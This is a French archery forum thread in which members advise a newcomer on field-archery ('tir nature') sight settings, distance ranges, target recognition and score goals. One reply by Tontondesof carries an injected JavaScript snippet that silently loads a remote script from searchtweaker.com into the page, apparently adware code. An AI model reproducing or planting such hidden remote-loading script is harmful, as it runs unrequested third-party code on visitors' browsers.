AccueilAccueil  RechercherRechercher  S'enregistrerS'enregistrer  FacebookFacebook  ConnexionConnexion  
Le deal à ne pas rater :
Jeux, jouets et Lego : le deuxième à -50% (large sélection)
Voir le deal

 

 Tir nature

Aller en bas 
+3
Gil092
Illyan
fred21
7 participants
AuteurMessage
Invité
Invité




Tir nature Empty
MessageSujet: Tir nature   Tir nature EmptyMar 19 Mar 2013, 18:08

Alors voila dimanche prochain je fait mon premier nature (en réalité c'est mon deuxième car l'an dernier j'ai commencer la saison par un nature)

Mais je ne sait pas trop de quelle manière aborder la chose car c'est quand même bien différent du 3D

Quelle configurations avez vous? viseur multi point ou certains tirent avec leurs scope?

La question peut paraître bête mais je ne sait ps trop comment m'y prendre

Pour le viseur si scope comment faites vous? vous régler a toutes les cible ou alors vous partez avec un réglage a 20m et vous contre-visé?

L'approche du tir n'est pas la même car moins de temps et pas de jumelles

Voila c'est a peut prés toutes les questions con que j'avait a poser
Revenir en haut Aller en bas
fred21
Fleche Bleue
Fleche Bleue
fred21


Masculin Nombre de messages : 532
Age : 58
Localisation : dijon
Matériel : elite archery VICTORY 39 ROUGE
Date d'inscription : 30/06/2008

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 18:17

le tir nature est un tir de zone, il faut être précis quand même, surtout dans tes réglages.

en nature les distance on les connait en fin normalement, par rapport au blason une bonne aide quand même ,birdy,petit gibier, moyen gibier, grand gibier.

pourquoi multi points, pourquoi changer entre nature et 3d, le tir nature et un échauffement avant les bébêtes en 3d.
Revenir en haut Aller en bas
http://www.dijontiralarc.fr/
Invité
Invité




Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 18:29

fred21 a écrit:
le tir nature est un tir de zone, il faut être précis quand même, surtout dans tes réglages.

en nature les distance on les connait en fin normalement, par rapport au blason une bonne aide quand même ,birdy,petit gibier, moyen gibier, grand gibier.

pourquoi multi points, pourquoi changer entre nature et 3d, le tir nature et un échauffement avant les bébêtes en 3d.


bah tout simplement pour gagner du temps? avec un multi point tu fait des réglage "moyen" suivant les type de cible

alors qu'avec un scope il faut régler a chaque cible non?

Revenir en haut Aller en bas
Illyan
Testeur Fou
Testeur Fou
Illyan


Masculin Nombre de messages : 8376
Age : 51
Localisation : Chez moi ^^
Matériel : Martin Axon 36 2018
Date d'inscription : 17/12/2007

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 19:08

Alors, pour commencer, ne change rien à ton arc...

Par contre, tu n'as que 45 seconde et ça passe très très vite!!!! Si tu n'as pas fait 5 m entre les deux cibles, vise plutôt le bas de la zone que de toucher au viseur, tu gagneras de précieuses secondes.

Commence par apprendre par coeur un maximum de blason, tu peux facilement trouver des catalogues sur WebArcherie et tu as ce site pour t'entrainer: http://blasonsnature.simplissite.com/categories.html

Ensuite retiens et apprends les différentes plages de distances:

Birdies: deux cibles, une rouge pour le pas rouge, une bleu/blanche sur le pas blanc, de 5 à 15 m...un simple réglage à 15/20 m suffit en général
Petit gibiers: de 15 à 25 m, normalement tu le gère avec ton viseur réglé à 22/23m
Moyens gibiers: de 20 à 35 m: attention danger, la zone est aussi grosse que les petits gibiers, c'est là que la différence se fait, là deux réglages principaux 27m et 32 m, mais essai de bien estimer la distance, la moyenne des cibles tourne à 30 m
Gros gibiers: à part si tu vois une zone immense, tu règle sur 35/37m et ça passe

Si tu peux, essai d'encocher la flèche au piquet d'attente, une fois l'archer avant toi revenu, tu gagneras 3 seconde au pas rouge, que tu pourra employer à l'estimation.

Estimation:

Tu as maximum 7 m entre chaque piquets et tu as 25 m maxi au piquet blanc pour un moyen et 30 m pour un gros. Donc sert toi de ça pour faire une bonne estimation si tu as un doute (normalement, tu estime surtout les moyens)

Voilà....
Revenir en haut Aller en bas
http://www.deadcenterarchery.com/main/index.php
Illyan
Testeur Fou
Testeur Fou
Illyan


Masculin Nombre de messages : 8376
Age : 51
Localisation : Chez moi ^^
Matériel : Martin Axon 36 2018
Date d'inscription : 17/12/2007

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 19:10

vincent_74500 a écrit:
fred21 a écrit:
le tir nature est un tir de zone, il faut être précis quand même, surtout dans tes réglages.

en nature les distance on les connait en fin normalement, par rapport au blason une bonne aide quand même ,birdy,petit gibier, moyen gibier, grand gibier.

pourquoi multi points, pourquoi changer entre nature et 3d, le tir nature et un échauffement avant les bébêtes en 3d.


bah tout simplement pour gagner du temps? avec un multi point tu fait des réglage "moyen" suivant les type de cible

alors qu'avec un scope il faut régler a chaque cible non?


Un ami a mis un second pin réglé à -5 ou -7 m sur son sccope, rien que pour le nature
Revenir en haut Aller en bas
http://www.deadcenterarchery.com/main/index.php
Invité
Invité




Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 20:11

merci illyan pour tes réponses claires et précise

donc si je résume bien avec 3 réglage on s'en sort 15-25-35

j'ai de la chance sur mon vector j'ai vraiment très très peut d'abaque donc pour le nature peut de chance de me tromper

je vient de comprendre que les zones sont bien plus grosses donc le réglage a beaucoup moins d'importance qu'en 3D

tout devrait bien se passer

par contre pour l'histoire de connaître les blasons et estimer en fonction de l'écart des piquet c'est bien trop m'en demander

je peut regarder tout le catalogue des blasons je les aurais tous oublier demain

pas de cerveau pas choco Very Happy

sa va le faire je pense!! objectif 1300 (je me rends pas compte de si c'est beaucoup ou pas)
Revenir en haut Aller en bas
Illyan
Testeur Fou
Testeur Fou
Illyan


Masculin Nombre de messages : 8376
Age : 51
Localisation : Chez moi ^^
Matériel : Martin Axon 36 2018
Date d'inscription : 17/12/2007

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 20:24

vincent_74500 a écrit:
merci illyan pour tes réponses claires et précise

donc si je résume bien avec 3 réglage on s'en sort 15-25-35

j'ai de la chance sur mon vector j'ai vraiment très très peut d'abaque donc pour le nature peut de chance de me tromper

je vient de comprendre que les zones sont bien plus grosses donc le réglage a beaucoup moins d'importance qu'en 3D

tout devrait bien se passer

par contre pour l'histoire de connaître les blasons et estimer en fonction de l'écart des piquet c'est bien trop m'en demander

je peut regarder tout le catalogue des blasons je les aurais tous oublier demain

pas de cerveau pas choco Very Happy

sa va le faire je pense!! objectif 1300 (je me rends pas compte de si c'est beaucoup ou pas)

Très sincèrement, 1300 c'est peu...planche un 1350 pour commencer...

Enfin, je dis ça par rapport à mes indicateurs régionaux...ici en dessous de 1420 tu n'est même pas 4ème...

Coupons la poire en deux: 1320 (comme mon, premier parcours avec 2 pailles), avec un abaque loin d'être efficace Rolling Eyes
Revenir en haut Aller en bas
http://www.deadcenterarchery.com/main/index.php
Invité
Invité




Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 20:41

hoho je crois que mon seul et unique nature de l'an dernier avait scoré a 1145 c'est vraiment peut alors

on verras bien dimanche et on feras au mieux car le nature n'est pas ma priorité Very Happy mais je prend sa comme un entraînement pour le 3D
Revenir en haut Aller en bas
Gil092
Fleche Bleue
Fleche Bleue
Gil092


Masculin Nombre de messages : 923
Age : 66
Localisation : 78
Matériel : PSE Supra
Date d'inscription : 27/05/2008

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 20:42

Je tire au scope Viper monopoint en nature comme en 3D. Je n'aime pas le multipoint qui me pollue la visée et l'obligation de prendre "entre deux" quand tu as une distance qui ne correspond pas à tes réglages des différents points. Je tire vite et je me permets de règler le viseur entre les deux piquets de tir, mais beaucoup d'archers contrevisent pour éviter un 2ème réglage. Par exemple, si tu avances de 5 m au pas bleu, tu vises "bas de tué" et ça suffit amplement puisque que tu as un bon abaque. Petite astuce quand tu ne tires pas en tête : écouter le temps de vol des flèches permet d'apprécier la distance à la louche et de prérègler avant de tirer. (avec l'habitude, ça devient précis à 3 ou 4m près). J'ai une petite règlette avec les distances sur mon viseur, et avec le débrayage rapide, je règle en 1 ou 2 secondes.
Non, vraiment, pas de problème au scope monopoint avec un peu d'expérience.
L'apprentissage des blasons est très important, surtout pour les bestioles un peu bizarre ou en position particulières. Si tu veux juste t'amuser c'est pas nécessaire, mais pour faire des points, c'est un peu obligé. Même si c'est un tir de "zone", tu peux faire un super tir et être juste à côté de ton "tué". Et perdre 10 points d'un coup sur une cible en TL, ça ne se rattrape que très difficilement. Fait gaffe aux "birdy" à 5m, ça à l'air de devenir à la mode et j'en ai rencontré plusieurs dernièrement. Le réglage à 30 ou 35m est nécessaire à 5m en raison du paradoxe de la flèche. (et 25m à 6m) dans mon cas.

Tir nature Sx_20010
Revenir en haut Aller en bas
https://tiralarc78.jimdofree.com/calendrier-concours/
moulefrite
Fleche Jaune
Fleche Jaune
moulefrite


Masculin Nombre de messages : 2362
Age : 55
Localisation : Rhône-Alpes
Matériel : cervo lent
Date d'inscription : 21/04/2011

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 21:34

Ba moi jprends mon bout de bois et je tire mes fûts à la : "one again bistoufly", et vas-y çà rentre Laughing

Pas besoin de 4 points ou de tous artifices Tir nature 897311
Revenir en haut Aller en bas
Tontondesof
Fleche Bleue
Fleche Bleue
Tontondesof


Masculin Nombre de messages : 572
Age : 65
Localisation : PIERRELATTE
Matériel : BOWTECH SENTINEL et THE BOSS et THE RECKONNING
Date d'inscription : 11/01/2010

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 23:18

moulefrite a écrit:
Ba moi jprends mon bout de bois et je tire mes fûts à la : "one again bistoufly", et vas-y çà rentre Laughing

Pas besoin de 4 points ou de tous artifices Tir nature 897311

Excellent !!! Laughing Laughing Laughing Laughing Laughing(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Revenir en haut Aller en bas
Tontondesof
Fleche Bleue
Fleche Bleue
Tontondesof


Masculin Nombre de messages : 572
Age : 65
Localisation : PIERRELATTE
Matériel : BOWTECH SENTINEL et THE BOSS et THE RECKONNING
Date d'inscription : 11/01/2010

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMar 19 Mar 2013, 23:18

moulefrite a écrit:
Ba moi jprends mon bout de bois et je tire mes fûts à la : "one again bistoufly", et vas-y çà rentre Laughing

Pas besoin de 4 points ou de tous artifices Tir nature 897311

Excellent !!! Laughing Laughing Laughing Laughing Laughing
Revenir en haut Aller en bas
Invité
Invité




Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMer 20 Mar 2013, 07:09

moulefrite a écrit:
Ba moi jprends mon bout de bois et je tire mes fûts à la : "one again bistoufly", et vas-y çà rentre Laughing

Pas besoin de 4 points ou de tous artifices Tir nature 897311

Tir nature Bisous36 Tir nature Bisous36
Revenir en haut Aller en bas
zesteph
Fleche Blanche
Fleche Blanche
zesteph


Masculin Nombre de messages : 93
Age : 50
Localisation : Toulouse
Matériel : Poulie: Hoyt contender Elite XT2000 48" ; BB : SF forged plus, branches SF premium 68/22
Date d'inscription : 17/01/2013

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMer 20 Mar 2013, 15:50

Merci Illyan pour toutes tes applications, qui pour ma part, me seront tres utile lorsque je me mettrais à faire du nature, car cela me botte bien cette discipline.
Revenir en haut Aller en bas
Invité
Invité




Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMer 20 Mar 2013, 16:06

Illyan a écrit:
Alors, pour commencer, ne change rien à ton arc...

Par contre, tu n'as que 45 seconde et ça passe très très vite!!!! Si tu n'as pas fait 5 m entre les deux cibles, vise plutôt le bas de la zone que de toucher au viseur, tu gagneras de précieuses secondes.

Commence par apprendre par coeur un maximum de blason, tu peux facilement trouver des catalogues sur WebArcherie et tu as ce site pour t'entrainer: http://blasonsnature.simplissite.com/categories.html

Ensuite retiens et apprends les différentes plages de distances:

Birdies: deux cibles, une rouge pour le pas rouge, une bleu/blanche sur le pas blanc, de 5 à 15 m...un simple réglage à 15/20 m suffit en général
Petit gibiers: de 15 à 25 m, normalement tu le gère avec ton viseur réglé à 22/23m
Moyens gibiers: de 20 à 35 m: attention danger, la zone est aussi grosse que les petits gibiers, c'est là que la différence se fait, là deux réglages principaux 27m et 32 m, mais essai de bien estimer la distance, la moyenne des cibles tourne à 30 m
Gros gibiers: à part si tu vois une zone immense, tu règle sur 35/37m et ça passe

Si tu peux, essai d'encocher la flèche au piquet d'attente, une fois l'archer avant toi revenu, tu gagneras 3 seconde au pas rouge, que tu pourra employer à l'estimation.

Estimation:

Tu as maximum 7 m entre chaque piquets et tu as 25 m maxi au piquet blanc pour un moyen et 30 m pour un gros. Donc sert toi de ça pour faire une bonne estimation si tu as un doute (normalement, tu estime surtout les moyens)

Voilà....

Autre moyen pour faire la diff entre les PG et MG, si tu vois les zones.
Le MG a deux zone "tué" ou "boudin" et le PG en a que une.
Mais attention parfois on ne distingue pas les zones du pas de tir.
Revenir en haut Aller en bas
Invité
Invité




Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyMer 20 Mar 2013, 17:14

Gil092 a écrit:
Je tire au scope Viper monopoint en nature comme en 3D. Je n'aime pas le multipoint qui me pollue la visée et l'obligation de prendre "entre deux" quand tu as une distance qui ne correspond pas à tes réglages des différents points. Je tire vite et je me permets de règler le viseur entre les deux piquets de tir, mais beaucoup d'archers contrevisent pour éviter un 2ème réglage. Par exemple, si tu avances de 5 m au pas bleu, tu vises "bas de tué" et ça suffit amplement puisque que tu as un bon abaque. Petite astuce quand tu ne tires pas en tête : écouter le temps de vol des flèches permet d'apprécier la distance à la louche et de prérègler avant de tirer. (avec l'habitude, ça devient précis à 3 ou 4m près). J'ai une petite règlette avec les distances sur mon viseur, et avec le débrayage rapide, je règle en 1 ou 2 secondes.
Non, vraiment, pas de problème au scope monopoint avec un peu d'expérience.
L'apprentissage des blasons est très important, surtout pour les bestioles un peu bizarre ou en position particulières. Si tu veux juste t'amuser c'est pas nécessaire, mais pour faire des points, c'est un peu obligé. Même si c'est un tir de "zone", tu peux faire un super tir et être juste à côté de ton "tué". Et perdre 10 points d'un coup sur une cible en TL, ça ne se rattrape que très difficilement. Fait gaffe aux "birdy" à 5m, ça à l'air de devenir à la mode et j'en ai rencontré plusieurs dernièrement. Le réglage à 30 ou 35m est nécessaire à 5m en raison du paradoxe de la flèche. (et 25m à 6m) dans mon cas.

Tir nature Sx_20010

merci pour ta réponse Wink donc beaucoup contre-vise pour la seconde flèche (ce qui parait logique)
ensuite pour ce qui est d'écouter les temps de vol j'ai l'habitude de faire sa en 3D sachant que je suis très souvent avec le même collègue donc je commence a connaitre sont tir et je m'appuie toujours la dessus pour faire un pré réglage

et pour mon 5M pas de soucis je sait ou il se situe (42m pour moi) Wink

je vais essayer d'ici la de retenir un peut les blasons Very Happy

et puis je le ferais peut étre avec mon verre X2 pour tester plutôt que de tester directement sur un 3D (car le 3D est tout de même ma priorité)
Revenir en haut Aller en bas
Ervan
Fleche Blanche
Fleche Blanche
Ervan


Masculin Nombre de messages : 76
Age : 48
Localisation : Cornusse (Cher)
Matériel : Prime centroid et One MX - viseur Axcel - scope Arrowtech 3DNA et SC29
Date d'inscription : 06/12/2012

Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature EmptyJeu 28 Mar 2013, 08:23

Alors ce premier concours, ça a donné quoi?
Revenir en haut Aller en bas
http://avordtiralarc.jimdo.com/
Contenu sponsorisé





Tir nature Empty
MessageSujet: Re: Tir nature   Tir nature Empty

Revenir en haut Aller en bas
 
Tir nature
Revenir en haut 
Page 1 sur 1
 Sujets similaires
-
» tir nature
» 3D- NATURE
» Le complet en tir nature
» Viseur tir nature / 3D
» PCE XL en parcours nature, 3D

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Archery-Online :: Tir à l'arc :: Technique & Réglements-
Sauter vers: